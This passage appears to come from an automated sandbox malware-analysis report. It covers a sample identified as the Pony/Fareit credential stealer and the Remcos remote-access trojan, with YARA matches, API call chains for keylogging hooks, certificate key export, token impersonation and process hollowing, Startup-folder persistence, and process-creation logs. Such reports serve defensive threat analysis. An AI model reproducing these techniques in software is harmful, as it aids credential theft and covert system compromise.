BV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040F0DF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040469B GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,11_2_0040469B

                    E-Banking Fraud

                    Source: Yara match | File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: Yara match | File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00411F9F ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,11_2_00411F9F

                    System Summary

                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Signatures Results: All Signatures
                    Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019F91C NtUnmapViewOfSection,9_2_0019F91C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E14C ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E14C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0222B2E50_2_0222B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0218B2E52_2_0218B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004121E95_2_004121E9
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402EFD5_2_00402EFD
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_01FEB2E510_2_01FEB2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00404351 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00401D71 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: String function: 00410808 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: String function: 0041282A appears 41 times
                    Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: scan[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: SGS.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000000.2050062927.000000000046F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000003.2141671886.0000000004861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000002.2142430073.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000002.2306718875.0000000000944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.00000000008A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe.0.drBinary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.evad.winEXE@23/8@3/2
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,5_2_0040D3BE
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,5_2_00402968
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040E7DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0040E7DF
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,5_2_00402CE7
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040A875 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,5_2_0040A875
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040937B FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0040937B
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00410C16 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00410C16
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-XVE2ON
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SGS.exe, 00000005.00000003.2179937676.000000000073B000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334695453.0000000000675000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334800606.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp60.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
